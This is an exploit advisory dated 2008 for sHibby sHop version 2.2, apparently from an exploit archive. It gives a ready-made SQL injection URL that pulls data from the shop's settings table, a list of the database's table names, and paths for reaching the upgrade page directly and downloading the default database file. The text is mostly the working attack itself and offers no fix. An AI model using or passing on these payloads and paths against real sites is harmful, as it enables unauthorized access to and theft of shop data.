sHibby sHop <= 2.2 (SQL-Update) Multiple Remote Vulnerabilities

2008-06-22 00:00:00

Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476



SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

------------

Update file ( Direct Access )

http://localsite.com/path/upgrade.asp


And default Database file

http://target.com/path/Db/urun.mdb

###############################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.